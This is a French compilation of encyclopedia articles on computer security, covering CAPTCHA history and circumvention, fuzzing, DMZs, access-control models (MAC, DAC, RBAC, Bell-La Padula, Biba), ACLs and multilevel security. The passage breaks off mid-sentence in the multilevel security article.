Histoire Dès le début d'Internet, les utilisateurs ont toujours voulu rendre le texte illisible par les ordinateurs. Les premiers furent les hackers, postant sur des sujets sensibles dans des forums en ligne, qui étaient automatiquement surveillés avec des mots-clefs. Pour contourner ces filtres, ces hackers ont commencé à remplacer les mots par des caractères visuellement ressemblants. Par exemple, HELLO pouvait être remplacé par |-|3|_|_() ou )-(3££0, ainsi qu'une multitude d'autres variantes numériques. Ainsi les filtres à mots-clefs ne pouvaient pas tous les détecter. Ce procédé fut plus tard connu sous le nom de « 13375p34k » (leetspeak). La première réflexion sur la création de tests automatiques qui pourraient distinguer les humains des ordinateurs dans le but de contrôler l'accès aux services web est apparue dans un manuscrit de Moni Naor de l'institut de science de Weizmann, daté de 1996, et intitulé Verification of a human in the loop, or Identification via the Turing Test. Des captcha primitifs semblent avoir été développés plus tard, en 1997 chez AltaVista par Andrei Broder et ses collègues dans le but d'empêcher des robots d'ajouter des sites à leur moteur de recherche. En recherchant un moyen de rendre leurs images résistantes à des attaques de logiciels de reconnaissance de caractères, l'équipe a cherché dans le manuel de leur numériseur de marque Brother, qui donnait des recommandations pour améliorer les performances de la reconnaissance de caractères (types d'écritures similaires, fond homogène…). L'équipe conçut des puzzles en essayant de simuler ce qui pourrait causer une mauvaise reconnaissance automatique de caractères. En 2000, von Ahn et Blum développèrent et publièrent la notion de captcha, qui comprenait tout programme qui pouvait différencier un humain d'un ordinateur. Ils inventèrent de multiples exemples de captcha, dont les premiers qui furent largement utilisés (par Yahoo! notamment). CAPTCHA 179

Caractéristiques Les captchas sont, par définition, entièrement automatisés, ne nécessitant qu'une petite intervention humaine lors de l'utilisation du test. Ceci présente donc des bénéfices au niveau des coûts et des performances. L'algorithme utilisé pour créer un captcha est souvent public, bien qu'il puisse être breveté. Ceci est fait dans le but de démontrer que casser ce type de test nécessite la résolution d'un problème difficile en faisant appel à des notions de l'intelligence artificielle, plutôt que la découverte des secrets de l'algorithme, qui pourraient être obtenus par décompilation ou un autre moyen.

Complexité La complexité de certains types de ce système contribue à pénaliser l'expérience des internautes contraints d'essayer plusieurs fois des combinaisons possibles. En effet, certains captcha sont tellement déformés pour éviter une reconnaissance automatique que même les internautes ne peuvent les reconnaître. Pire, certain captchas sont plus facilement reconnus par les ordinateurs.[réf. nécessaire] De plus, leur efficacité est contestée et des captchas peuvent être reconnus en quelques secondes[2]

Accessibilité Les tests de captcha basés sur une lecture de texte - ou toute autre tâche de perception visuelle - rendent impossible l'accès aux ressources protégées pour des personnes déficientes visuelles. Néanmoins, le captcha n'a pas forcément besoin d'être visuel. N'importe quel problème d'intelligence artificielle, comme la reconnaissance vocale, peut être utilisé comme base pour un test de captcha. Certaines implémentations de captcha permettent aux utilisateurs d'opter pour un captcha audio. Le développement des captcha audio semble être en retard par rapport aux tests visuels. D'autres types de tests, comme ceux qui nécessitent une compréhension de texte (par exemple, un puzzle logique, des questions ou des instructions pour créer un mot de passe) peuvent aussi constituer des méthodes utilisables dans le cadre d'un captcha. Encore une fois, il n'y a que peu d'études concernant leur résistance face aux contre-mesures. Quelques tests intéressants apparurent avec l'idée de la reconnaissance d'images. KittenAuth[3] est un test de ce type, qui demande à l'utilisateur de reconnaître un animal (des chatons) dans une série de photographies de différentes espèces (dauphins, chiots, renards, etc.) Pour les personnes déficientes visuelles (comme les utilisateurs aveugles ou ayant des difficultés à la perception des couleurs), les captcha visuels présentent de sérieuses difficultés. Du fait que les captcha sont conçus pour ne pas être lisibles par les machines, les outils courants d'aide comme les lecteurs d'écran ne peuvent pas les interpréter. Du fait que certains sites peuvent utiliser les tests de captcha dès le processus d'inscription initial, ou même à chaque connexion, ces derniers peuvent complètement bloquer l'accès. Dans certaines juridictions, les propriétaires de sites peuvent devenir la cible de litiges s'ils utilisent des captcha qui discriminent les gens ayant certains handicaps. Dans d'autres cas, ceux qui ont des difficultés visuelles peuvent choisir d'identifier un mot qui leur est lu. Bien que fournir un captcha audio permette aux utilisateurs aveugles de lire le texte, ce procédé exclut toujours les personnes souffrant à la fois d’un déficit visuel et auditif[4]. L'utilisation d'un captcha empêche ainsi un grand nombre d'individus d'utiliser tous les services basés sur Internet comme PayPal, Gmail, Orkut, Yahoo!, ainsi que de nombreux forums et blogs. Même pour des personnes parfaitement voyantes, les nouvelles générations de captcha, conçues pour résister aux logiciels sophistiqués de reconnaissance, peuvent devenir pratiquement impossibles à lire. Un rapport du W3C a souligné l'inaccessibilité de certains tests visuels anti-robots[5]. CAPTCHA 180

Contournement Il y a plusieurs approches pour mettre en échec un captcha, détaillées ci-après : • utiliser une main-d’œuvre humaine pour les reconnaître : • rémunérer des décodeurs de captcha dans des pays à bas coût de main-d’œuvre ; •• posséder soi-même un site assez bien fréquenté demandant aux utilisateurs de résoudre un captcha, qui provient en réalité d'un autre site, en temps réel ; •• exploiter les bogues dans les implémentations qui permettent à l'attaquant de passer complètement outre le captcha ; • améliorer les logiciels de reconnaissance de caractères ; • l'attaque par force brute ou l'attaque par dictionnaire, qui peuvent être facilitées par la reconnaissance partielle du captcha (notamment le nombre de caractères).

Main-d’œuvre humaine Il est possible de passer au travers du test de captcha en utilisant des opérateurs humains employés à décoder les captcha. Une publication du W3C indique qu'un tel opérateur « pourrait aisément vérifier des centaines de captcha par heure ». Des entreprises de services indiennes sont spécialisées dans ce négoce[6]. Des spammeurs ont réussi à contourner la difficulté en créant des sites internet qui demandent à ce que l'utilisateur passe un test de captcha pour y accéder, ce test étant en fait celui requis par un autre site, tel celui de Yahoo pour valider la création d'une nouvelle adresse électronique. L'utilisateur du premier site contribue ainsi, à son insu, aux actes malveillants de ces derniers. Une contre-mesure existe : ajouter, dans le captcha, une expression identifiant clairement son émetteur (telle que « yahoo.fr »).

Bogues de conception Certains systèmes de protection par captcha mal conçus peuvent parfois être forcés sans utiliser de logiciels de reconnaissance de caractères, mais simplement en réutilisant l'ID d'une session d'une image connue de captcha. Parfois, si une partie du logiciel qui génère le captcha est située côté client (la validation est faite sur un serveur, mais le texte que l'utilisateur doit saisir pour s'identifier est généré côté client), alors les utilisateurs peuvent modifier le logiciel client pour afficher le texte de captcha non déformé par exemple.

Reconnaissance automatique de caractères Bien que les captcha fussent initialement conçus pour contrer les logiciels de reconnaissance de caractères standards utilisés pour la numérisation par balayage de documents, plusieurs projets de recherche ont prouvé qu'il est possible de décrypter un grand nombre de captcha avec des programmes spécifiquement adaptés à un type de captcha. Pour des captcha avec des lettres déformées, l'approche adaptée est constituée d'une manière générale par les étapes suivantes : 1.1.suppression du fond de l'image, par exemple avec des filtres de couleurs et la détection de lignes fines ; 2.2.segmentation, c'est-à-dire découpe de l'image en plusieurs segments contenant une seule lettre ; 3.3.identification de la lettre contenue dans chaque segment. Le reCAPTCHA propose une approche semblable, à l'échelle des mots. CAPTCHA 181

Utilisations déviées • En numérisation de livres : le reCAPTCHA propose deux mots dont le premier est connu et sert de CAPTCHA et dont le second est incertain voire inconnu car issu de la numérisation d'un livre. Cela permet d'aider à la numérisation de textes mal scannés. •• En publicité : certaines entreprises proposent d'utiliser le captcha comme vecteur de propagation de publicité.

Notes et références

[1] http:/ / www. captcha. net/

[2] http:/ / www. xmcopartners. com/ article-captcha. html

[3] KittenAuth (http:/ / www. thepcspy. com/ kittenauth/ ). [4] D'après sense.org.uk, environ 4 % des gens au Royaume-Uni ont de sérieuses déficiences visuelles et auditives. D'après le Consortium national d'assistance technique pour les enfants et jeunes adultes aveugles, sourds et muets (NTAC), il y avait 9 516 enfants aveugles, sourds et muets aux États-Unis en 2004. L'université Gallaudet cite une estimation de 1993 qui donne 35 000 adultes entièrement aveugles, sourds et muets aux États-Unis. L'estimation de la population aveugle, sourde et muette dépend du degré de handicap retenu dans les définitions.

[5] (http:/ / www. yoyodesign. org/ doc/ w3c/ turingtest-20051123/ ) « Souvent, ces systèmes de vérification font qu'il est impossible, pour certains utilisateurs handicapés, de créer des comptes, de rédiger des commentaires ou de faire des achats sur les sites, c'est-à-dire que les captcha ne reconnaissent pas les utilisateurs handicapés comme étant des utilisateurs humains. »

[6] Inside India's CAPTCHA solving economy (http:/ / blogs. zdnet. com/ security/ ?p=1835). ZDNet, 29 aout 2009. La rémunération mentionnée par l'article est de l'ordre de 2 dollars pour mille problèmes résolus.

Durcissement

Cette page d’homonymie répertorie les différents sujets et articles partageant un même nom. __DISAMBIG__ • Durcissement, modes de conception et de réalisation destinés à rendre des systèmes électroniques résistants aux rayonnements ionisants. • Durcissement, processus destiné à sécuriser un système informatique. • Durcissement, modification phonétique par renforcement de l'articulation. • Durcissement, processus psychologique ou social par lequel un acteur sociologique adopte des positions de plus en plus rigides pour faire valoir son point de vue. Fuzzing 182 Fuzzing

Le fuzzing (ou test à données aléatoires[1]) est une technique pour tester des logiciels. L'idée est d'injecter des données aléatoires dans les entrées d'un programme. Si le programme échoue (par exemple en plantant ou en générant une erreur), alors il y a des défauts à corriger. Exemples de points d'entrée d'un programme : •• Fichiers • Périphériques (clavier, souris, etc.) •• Variables d'environnement •• Réseau • Limitation des ressources (mémoire, disque dur, temps CPU, etc.) •• etc. Le grand avantage du fuzzing est que l'écriture de tests est extrêmement simple, ne demande aucune connaissance du fonctionnement du système et permet de trouver des vulnérabilités facilement. D'ailleurs, le fuzzing est également utilisé pour traquer des failles de sécurité ou dans la rétro-ingénierie. La première trace du fuzzing est la publication datant du 12 décembre 1990 : « An Empirical Study of the Reliability of UNIX Utilities » [2] écrite par Barton P. Miller, Lars Fredriksen, et Bryan So. Le résumé indique que durant les essais ils ont été capables de faire planter « entre 25 et 33 % des programmes utilitaires de n'importe quelle version d'UNIX ». Le rapport présente les outils de test mais également l'origine des erreurs. Le fuzzing est tellement simple à utiliser et si efficace pour trouver des vulnérabilités que le chercheur en sécurité informatique Charlie Miller a refusé de dévoiler les vulnérabilités zero day trouvées dans le code de logiciels célèbres (contrairement au règlement du concours de sécurité informatique Pwn2Own), afin de protester contre les éditeurs qui n'utilisent pas assez cette technique simple selon lui[3]. Inversement au fuzzing qui est une méthode de test par boîte noire, la méthode de test par boîte blanche analyse un système dont on connaît exactement le fonctionnement.

Références

[1] TermWiki : Fuzz Testing (http:/ / fr. termwiki. com/ FR:fuzz_testing_â)

[2] http:/ / www. cs. wisc. edu/ ~bart/ fuzz/ fuzz. html

[3] Pwn2Own : un hacker refuse de dévoiler à Adobe, Microsoft et Apple leurs failles (http:/ / www. zdnet. fr/ actualites/

pwn2own-un-hacker-refuse-de-devoiler-a-adobe-microsoft-et-apple-leurs-failles-39750412. htm), par Christophe Auffray (ZDNet France), le

Liens externes

• (en) Site sur le fuzzing de l'Université de Wisconsin (http:/ / www. cs. wisc. edu/ ~bart/ fuzz/ fuzz. html), propose notamment le résultat d'analyse de tests de fuzzing sur plusieurs logiciels courants.

• (en) Microsoft's Secure Development Process (http:/ / msdn. microsoft. com/ security/ default. aspx?pull=/

library/ en-us/ dnsecure/ html/ sdl. asp) utilise le fuzzing

• (en) Folklore.org sur "MonkeyLives" (http:/ / folklore. org/ StoryView. py?project=Macintosh&

story=Monkey_Lives. txt) : Tests de fuzzing sur le Macintosh original

• Portail de la sécurité informatique Zone démilitarisée (informatique) 183 Zone démilitarisée (informatique)

Pour l’article homonyme, voir Zone démilitarisée. En informatique, une zone démilitarisée (ou DMZ, de l'anglais demilitarized zone) est un sous-réseau séparé du réseau local et isolé de celui-ci et d'Internet par un pare-feu. Ce sous-réseau contient les machines étant susceptibles d'être accédées depuis Internet. Le pare-feu bloquera donc les accès au réseau local pour garantir sa sécurité. Et les services susceptibles d'être accédés depuis Internet seront situés en DMZ. En cas de compromission d'un des services dans la DMZ, le pirate n'aura accès qu'aux machines de la DMZ et non au Schéma réseau d'une utilisation de DMZ avec un pare-feu. ADMER réseau local.

Le nom provient à l'origine de la zone coréenne démilitarisée. La figure ci-contre représente une architecture DMZ avec un pare-feu à trois interfaces. L'inconvénient est que si cet unique pare-feu est compromis, plus rien n'est contrôlé. Il est cependant possible d'utiliser deux pare-feu en cascade afin d'éliminer ce risque. Il existe aussi des architectures de DMZ où celle-ci est située entre le réseau Internet et le réseau local, séparée de chacun de ces réseaux par un pare-feu. 184

5-Contrôle d'accès en sécurité informatique 185

5.1-Types

Contrôle d'accès obligatoire

Le Mandatory access control (MAC) ou contrôle d'accès obligatoire est une méthode de gestion des droits des utilisateurs pour l'usage de systèmes d'information. Il existe d'autres méthodes telles que : • le contrôle d'accès discrétionnaire (ou Discretionary Access Control - DAC) ; • le contrôle d'accès à base de rôles (ou Role-Based Access Control - RBAC). Le contrôle d'accès obligatoire est utilisé lorsque la politique de sécurité des systèmes d’information impose que les décisions de protection ne doivent pas être prises par le propriétaire des objets concernés, et lorsque ces décisions de protection doivent lui être imposées par le dit système. Le contrôle d'accès obligatoire doit permettre d'associer et de gérer des attributs de sécurité relatifs à cette politique, sur les fichiers et processus du système. Les types de politiques de sécurité possibles pour un système informatique sont pris en compte pour déterminer sa classification en termes de niveau d'assurance selon la méthode « Critères communs », anciennement ITSEC (1991) ou TCSEC américaine de 1985 (DOD 5200.28) ayant défini le fameux niveau « C2 ». Se référer aux profils CAPP (Controlled Access) et LSPP (Labelled security) du niveau d'assurance EAL3 (ancien ITSEC E2).

Contrôle d'accès discrétionnaire

Cet article est une ébauche concernant la sécurité informatique. Vous pouvez partager vos connaissances en l’améliorant (comment ?) selon les recommandations des projets correspondants.

Le Contrôle d'accès discrétionnaire (DAC pour Discretionary access control) est un genre de contrôle d'accès, défini par le Trusted Computer System Evaluation Criteria (TCSEC) comme « des moyens de limiter l'accès aux objets basés sur l'identité des sujets ou des groupes auxquels ils appartiennent. Les commandes sont discrétionnaires car un sujet avec une certaine autorisation d'accès est capable de transmettre cette permission (peut-être indirectement) à n'importe quel autre sujet (sauf restriction du contrôle d'accès obligatoire). »

Définition élargie Le contrôle d'accès discrétionnaire est généralement défini par opposition au contrôle d'accès obligatoire (qui est un contrôle d'accès non discretionnaire parfois nommé égal). On peut également dire qu'un système a le contrôle d'accès discrétionnaire ou purement discrétionnaire comme manière de dire que le système manque d'un contrôle d'accès obligatoire. D'une part, on peut dire que des systèmes mettent en application l'IMPER et le DAC simultanément, où le DAC se rapporte à une catégorie de contrôles d'accès que les sujets peuvent transférer parmi l'un l'autre, et où l'IMPER se rapporte à une deuxième catégorie des contrôles d'accès qui impose des contraintes à la première. Contrôle d'accès discrétionnaire 186

La théorie et la pratique Cependant, la signification de la limite n'est pas dans la pratique aussi définie que la définition donnée dans la norme TCSEC. Par exemple, la limite est utilisée généralement dans les contextes qui supposent que, sous DAC, chaque objet a probablement un propriétaire qui commande les permissions d'accéder à l'objet, parce que beaucoup de systèmes appliquent le DAC en utilisant le concept d'un propriétaire. Mais la définition de TCSEC n'indique rien au sujet des propriétaires, techniquement un système de contrôle d'accès ne doit pas avoir un concept de propriétaire pour concilier la définition du TCSEC et du DAC. Autre exemple, des possibilités sont parfois décrites en tant que commandes discrétionnaires parce qu'elles permettent à des sujets de transférer leur accès à d'autres sujets, quoique la sécurité ne soit fondamentalement pas au sujet de l'accès basé sur l'identité des sujets. Des possibilités permettent généralement à des permissions d'être passées à n'importe quel autre sujet, pour passer ces permissions, il doit d'abord avoir accès au sujet de réception, et les sujets n'ont pas généralement accès à tous les sujets dans le système.

Contrôle d'accès à base de rôles

Cet article est une ébauche concernant la sécurité informatique. Vous pouvez partager vos connaissances en l’améliorant (comment ?) selon les recommandations des projets correspondants.

Role-Based Access Control (RBAC) ou, en français, contrôle d'accès à base de rôles est un modèle de contrôle d'accès à un système d'information dans lequel chaque décision d'accès est basée sur le rôle auquel l'utilisateur est attaché. Un rôle découle généralement de la structure d'une entreprise. Les utilisateurs exerçant des fonctions similaires peuvent être regroupés sous le même rôle. Un rôle, déterminé par une autorité centrale, associe à un sujet des autorisations d'accès sur un ensemble objets. La modification des contrôles d'accès n'est pas nécessaire chaque fois qu'une personne rejoint ou quitte une organisation. Par cette caractéristique, RBAC est considéré comme un système « idéal » pour les entreprises dont la fréquence de changement du personnel est élevée. Ce modèle est également référencé sous le nom de nondiscretionary access control et constitue une nouvelle alternative, entre les systèmes Mandatory Access Control (MAC) et Discretionary Access Control (DAC).

Liens externes • (fr) Présentation du contrôle d'accès basé sur un rôle [1] pour Microsoft Exchange Server par Microsoft • (fr) Livre Blanc sur la gestion des accès basée sur des rôles (RBAC) par Tools4ever [2] (PDF) • (en) NIST [3] (National Institute of Standards and Technology) : site officiel du NIST sur les systèmes RBAC (articles, etc.).

• Portail de la sécurité informatique

Références

[1] http:/ / technet. microsoft. com/ fr-fr/ library/ dd298183%28v=exchg. 150%29. aspx

[2] http:/ / www. tools4ever. fr/ files/ pdf_nl/ white_paper_rbac_fr. pdf

[3] http:/ / csrc. nist. gov/ groups/ SNS/ rbac/ Contrôle d'accès à base de règles 187 Contrôle d'accès à base de règles

Cet article est une ébauche concernant la sécurité informatique. Vous pouvez partager vos connaissances en l’améliorant (comment ?) selon les recommandations des projets correspondants.

RSBAC (Rule Set Based Access Control) est un ensemble de sécurité pour Linux dont la fonction est d'offrir un contrôle supplémentaire d'accès aux ressources. Il peut utiliser plusieurs modèles de sécurité différents, tels ACL, MAC, RC, etc. Il est utilisé par exemple dans le cas où il est utile de restreindre l'accès à certaines ressources au seul utilisateur root (qui a normalement accès à toutes les ressources). 188

5.2-Modèles

Modèle de Bell-La Padula

Cet article est une ébauche concernant la sécurité informatique. Vous pouvez partager vos connaissances en l’améliorant (comment ?) selon les recommandations des projets correspondants.

Le modèle de Bell-La Padula (BLP) a été développé par David Elliott Bell et Leonard J. La Padula en 1973 pour formaliser la politique de sécurité multi-niveau du Département de la Défense des États-Unis. Le modèle est un modèle de transition d'états de la politique de sécurité informatique qui décrit des règles de contrôle d'accès qui utilisent des mentions de sécurité sur les objets et les habilitations. Les mentions de sécurité sont relatives aux niveaux de classification des informations.

Modèle de Biba

Le modèle de Biba ou modèle d'intégrité de Biba, développé par Kenneth J. Biba en 1977[1] est un automate formalisé qui représente une politique de sécurité informatique. L'automate décrit des règles de contrôle d'accès afin de garantir l'intégrité des données. Le modèle est conçu de manière à ce que les intervenants ne soient pas en mesure de corrompre des données placées dans un niveau qui leur est supérieur, ou être corrompus par des données d'un niveau inférieur à celui de l'intervenant. Ce modèle fut inventé pour résoudre les faiblesses du modèle de Bell-LaPadula qui ne s'occupe que de la confidentialité et ne prend pas en compte l'intégrité des données.

Concepts En général, garantir l'intégrité des données vise à : •• empêcher des modifications par des tiers non-autorisés •• empêcher des modifications sur des données non-autorisées par des tiers autorisés • maintenir la cohérence interne (la fiabilité des données) et cohérence externe (ie. les données sont en adéquation avec la réalité et les besoins) Le modèle de Biba vise à assurer l'intégrité (plutôt que la confidentialité) au travers d'une règle simple : « pas d'écriture dans un niveau supérieur, pas de lecture d'un niveau inférieur ». Il s'agit d'une autre approche que le modèle de Bell-LaPadula qui se caractérise par « pas d'écriture dans un niveau inférieur, pas de lecture d'un niveau supérieur ». Les intervenants dans le modèle de Biba peuvent uniquement créer/modifier du contenu dans leur propre niveau ou dans un niveau inférieur (par exemple, un cadre peut écrire une liste de directives pour ses employés, mais pas pour son directeur situé à un niveau d'intégrité supérieur). De même, les utilisateurs ne peuvent que voir le contenu qui se trouve à leur niveau d'intégrité ou au-dessus (le cadre peut lire les directives du directeur, mais pas celles en provenance des employés). En effet, si la règle n'était pas respectée, cela signifierait que le directeur pourrait lire une fausse directive émanant d'un employé et qui mettrait en péril l'intégrité de données sensibles (par exemple, "multiplier tous les salaires par deux"). Modèle de Biba 189

Tout comme le modèle de Bell-LaPadula, le modèle de Biba définit une propriété de sécurité simple et une propriété * (étoile), mais leur signification est opposée entre les deux modèles. Dans le cas de Biba, ces propriétés sont : •• propriété de sécurité simple : un intervenant à un niveau donné d'intégrité ne peut pas lire un objet situé à un niveau d'intégrité inférieur •• propriété * (étoile) : un intervenant à un niveau donné d'intégrité ne peut pas écrire un objet à un niveau d'intégrité supérieur.

Notes et références

[1] Biba, K. J. "Integrity Considerations for Secure Computer Systems", MTR-3153, The Mitre Corporation, Avril 1977.

• Portail de la sécurité informatique Modèle de Brewer et Nash

Cet article est une ébauche concernant la sécurité informatique. Vous pouvez partager vos connaissances en l’améliorant (comment ?) selon les recommandations des projets correspondants.

Le modèle de Brewer et Nash est un modèle de sécurité qui fournit un contrôle d'accès à l'information qui peut évoluer dynamiquement. Ce modèle, aussi appelé modèle de la muraille de Chine, a été développé pour réduire les conflits d'intérêts dans des organisations commerciales.

Bibliographie •• Harris, Shon, All-in-one CISSP Exam Guide, Third Edition, McGraw Hill Osborne, Emeryvill, California, 2005`.

• Portail de la sécurité informatique Modèle de Clark-Wilson 190 Modèle de Clark-Wilson

Cet article est une ébauche concernant la sécurité informatique. Vous pouvez partager vos connaissances en l’améliorant (comment ?) selon les recommandations des projets correspondants.

Le modèle d'intégrité de Clark-Wilson est un modèle de sécurité qui fournit les fondations pour spécifier et analyser une politique d'intégrité pour un système informatique.

Liens externes • (en) [1] • (en) [2]

• Portail de la sécurité informatique

Références

[1] http:/ / www. computing. dcu. ie/ ~davids/ courses/ CA548/ C_I_Policies. pdf

[2] http:/ / doi. ieeecomputersociety. org/ 10. 1109/ SP. 1987. 10001

Modèle de Graham-Denning

Cet article est une ébauche concernant la sécurité informatique. Vous pouvez partager vos connaissances en l’améliorant (comment ?) selon les recommandations des projets correspondants.

Le modèle de Graham-Denning est un modèle de sécurité qui présente comment des sujets et des objets peuvent être créés et effacés. Il détermine aussi comment assigner de manière sécurisée des droits d'accès spécifiques. 191

5.3-Divers

Access Control List

Pour les articles homonymes, voir ACL. Access Control List (ACL) — liste de contrôle d'accès en français — désigne deux choses en sécurité informatique : • un système permettant de faire une gestion plus fine des droits d'accès aux fichiers que ne le permet la méthode employée par les systèmes UNIX. • en réseau, une liste des adresses et ports autorisés ou interdits par un pare-feu. Une ACL est une liste d’Access Control Entry (ACE) ou entrée de contrôle d'accès donnant ou supprimant des droits d'accès à une personne ou un groupe.

ACL sur les fichiers

Sous UNIX Sous UNIX, les ACL ne remplacent pas la méthode habituelle des droits. Pour garder une compatibilité, elles s'ajoutent à elle au sein de la norme POSIX 1e. Les systèmes de type UNIX n'acceptent, classiquement, que trois types de droits : • lecture (Read); • écriture (Write); • exécution (eXecute), pour trois types d'utilisateurs : •• le propriétaire du fichier ; •• les membres du groupe auquel appartient le fichier ; •• tous les autres utilisateurs. Cependant, cette méthode ne couvre pas suffisamment de cas, notamment en entreprise. En effet, les réseaux d'entreprises nécessitent l'attribut de droits pour certains membres de plusieurs groupes distincts, ce qui nécessite diverses astuces lourdes à mettre en œuvre et entretenir sous Unix. L'intervention de l'administrateur est souvent nécessaire pour créer les groupes intermédiaires qui permettront de partager des fichiers entre plusieurs utilisateurs ou groupes d'utilisateurs, tout en les gardant confidentiels face aux autres. Les ACL permettent de combler ce manque. On peut permettre à n'importe quel utilisateur, ou groupe, un des trois droits (lecture, écriture et exécution) et cela sans être limité par le nombre d'utilisateurs que l'on veut ajouter. Mac OS X gère les ACL depuis la version 10.4 (Tiger). Access Control List 192

Utilisation Les deux commandes permettant de visualiser les droits ACL et de les modifier sont, sous UNIX : • getfacl : pour visualiser • setfacl : pour modifier Il faut néanmoins avoir ajouté dans le fichier etc/fstab , en option, "acl".

Windows Les ACL sont implémentées par le système de fichiers NTFS, et prises en charge par Windows NT 4.0 et ses successeurs (Windows 2000, Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7 et Windows Server 2008 R2). Sous NTFS, les ACL peuvent être définis sur des fichiers ou des répertoires et acceptent les types de droits suivants : •• parcours d'un dossier ; •• liste d'un dossier ; •• lecture des méta-données ; •• ajout de fichier ; •• ajout de répertoire ; •• ajout de données à un fichier existant ; •• modification des droits ; •• suppression ; •• lecture ; •• appropriation ; •• exécution. Ces droits s'appliquent soit à des utilisateurs (réels, virtuels - tel le propriétaire du fichier - ou systèmes), soit à des groupes d'utilisateurs (réels, virtuels ou systèmes). L'application d'un droit à un utilisateur ou à un groupe est nommé ACE. Il est possible d'autoriser ou de rompre l'héritage hiérarchique des ACL entre les différents répertoires, ainsi que de paramétrer le type d'héritage (sur les dossiers, les fichiers, à tous niveaux de profondeur, uniquement le premier, etc.). Le nouveau système de fichiers, exFAT, proposé depuis le Service Pack 1 de Windows Vista et Windows CE 6 pour remplacer la FAT prend aussi en charge les ACL.

En réseau Une ACL sur un pare-feu ou un routeur filtrant, est une liste d'adresses ou de ports autorisés ou interdits par le dispositif de filtrage. Les Access Control List sont divisés en trois grandes catégories, l'ACL standard, l'ACL étendue et la nommée-étendue. •• l'ACL standard ne peut contrôler que deux ensembles : l'adresse IP source et une partie de l'adresse IP source, au moyen de masque générique. • l'étendue peut contrôler l'adresse IP de destination, la partie de l'adresse de destination (masque générique), le type de protocole (TCP, UDP, ICMP, IGRP, IGMP, etc.), le port source et de destination, les flux TCP, IP TOS (Type of service) ainsi que les priorités IP. •• la nommée-étendue est une ACL étendue à laquelle on a affecté un nom. Par exemple, sous Linux c'est le système Netfilter qui gère l'ACL. La création d'ACL qui autorise le courrier électronique entrant, depuis n'importe quelle adresse IP, vers le port 25 (alloué communément à SMTP) se fait avec la commande suivante : iptables --insert INPUT --protocol tcp --destination-port 25 --jump ACCEPT Access Control List 193

Iptables est la commande qui permet de configurer NetFilter. Les ACL conviennent bien à des protocoles dont les ports sont statiques (connus à l'avance) comme SMTP, mais ne suffisent pas avec des logiciels comme BitTorrent où les ports peuvent varier.

Liens externes • (fr) Les ACL [1] • (en) Les ACL POSIX sous Linux [2] • (fr) Gestion des droits de fichiers : générique et ACL [3]

• Portail de la sécurité informatique • Portail des télécommunications

Références

[1] http:/ / okki666. free. fr/ docmaster/ articles/ linux100. htm

[2] http:/ / www. suse. de/ ~agruen/ acl/ linux-acls/ online/

[3] http:/ / sluce. developpez. com/ acls

Sécurité multiniveau

Cet article est une ébauche concernant la sécurité informatique. Vous pouvez partager vos connaissances en l’améliorant (comment ?) selon les recommandations des projets correspondants.

La sécurité multi-niveau (en anglais multilevel security, en abrégé MLS) est un principe informatique permettant de catégoriser les entités d'un système en fonction de niveaux d'habilitation et de classification. Ils permettent que l'accès d'un sujet (utilisateur, processus, …) à un objet (fichier, mémoire, interface matérielle, …) ne soit plus uniquement assujetti à l'identité du sujet, mais avant tout au niveau d'habilitation du sujet par rapport au niveau de classification de l'objet fonction de la nature de l'action entreprise. Ceci permet à des entités de classification et d'habilitation différentes de cohabiter sur une même plateforme tout en garantissant un respect strict de la politique de confidentialité. Pour l'exemple, et entre autres choses, ce type de système permet donc l'accès simultané de différents utilisateurs à des données et outils de différents niveaux de classification, tout en garantissant que les utilisateurs ne pourront voir et accéder que les données et outils pour lesquels ils sont habilités.

Problématique adressée Dans les systèmes d'information conventionnels, le droit d'un sujet à entreprendre une action sur un objet est défini suivant les principes du Contrôle d'accès discrétionnaire (DAC - Discretionary Access Control), et est donc principalement lié à l'identité du sujet. Pour l'exemple, si un utilisateur possède un fichier, il peut alors le lire ou l'écrire comme il le souhaite. Au même titre, il est libre de le rendre accessible à d'autres utilisateurs d'une manière ou d'une autre, que ce soit par modification des droits d'accès du fichier ou par transfert via un média quelconque (envoi par messagerie, partage d'une copie de sauvegarde, etc.). Si les données en question ont un caractère confidentiel, c'est à l'utilisateur qu'incombe le devoir de les traiter comme telles. Le système ne dispose d'aucun moyen de gérer le niveau de sensibilité des entités qu'il héberge. Ceci illustre la problématique qui se pose dans les environnements où la gestion de la confidentialité est nécessaire. Sécurité multiniveau 194

MAC et labellisation Un autre principe de sécurité existe, le Contrôle d'accès obligatoire (MAC - Mandatory Access Control). Dans les systèmes d'information, ce principe se traduit par des critères d'autorisation extérieurs à l'identité du sujet. On considère donc tout d'abord des niveaux hiérarchiques de sensibilité qui seront affectés à chaque entité du système. Ils indiquent un niveau d'habilitation pour un sujet et de classification pour un objet. Par exemple, NON CLASSIFIE (NC) < DIFFUSION RESTREINTE (DR) < CONFIDENTIEL (C) < SECRET (S) < TRÈS SECRET (TS). Nous considérerons cette classification dans les quelques exemples qui suivent. Ensuite, sont définies des règles qui régissent leur gestion. Ces règles sont principalement issues des modèles de Bell et Lapadula et de Biba. Parmi les principales règles qui en découlent, citons les suivantes : • Un sujet ne peut accéder qu'aux objets d'un niveau de classification inférieure ou égale à son niveau d'habilitation.(Habilitation sujet >= Classification objet) Par exemple, un processus CONFIDENTIEL ne pourra ni voir ni communiquer avec un processus SECRET ou accéder quoi que ce soit de niveau SECRET. Cette règle interdit les manipulations d'un objet au delà de son habilitation. •• Un sujet ne peut accéder qu'en lecture aux objets d'un niveau inférieur de classification (Habilitation sujet = Classification objet). Par exemple, un processus CONFIDENTIEL pourra lire et écrire des données au niveau CONFIDENTIEL, mais ne pourra que lire des données d'un niveau inférieur (NC ou DR). Sans cette règle, notre process CONFIDENTIEL pourrait transférer par copie des informations de niveau CONFIDENTIEL dans un fichier de niveau NC. Cette règle l'interdit et permet d'éviter la déclassification sous seuls contrôle et autorité du sujet. •• Le niveau de sensibilité d'un sujet ou d'un objet ne peuvent pas être modifiée dynamiquement. Par exemple, un processus fonctionnant au niveau SECRET ne pourra pas basculer au niveau DR. Si l'application traduite par ce processus requiert de fonctionner à un niveau d'habilitation DR, il n'y aura d'autre option que d'en créer une nouvelle instance au niveau DR. Ce nouveau processus ne pourra alors ni voir, ni accéder à quoi que ce soit du niveau SECRET, même s'il appartient au même utilisateur disposant d'une habilitation maximale SECRET. La labellisation du système d'information est l'un des moyens d'implémenter les niveaux de sensibilité que nous venons d'évoquer. Le principe est d'attacher un label à chaque entité du système (utilisateurs, process, mémoire, interfaces, fichiers, etc.) décrivant son niveau de sensibilité. Lors de chaque interaction entre des entités du systèmes, les principes présentés ci-dessus sont alors appliqués 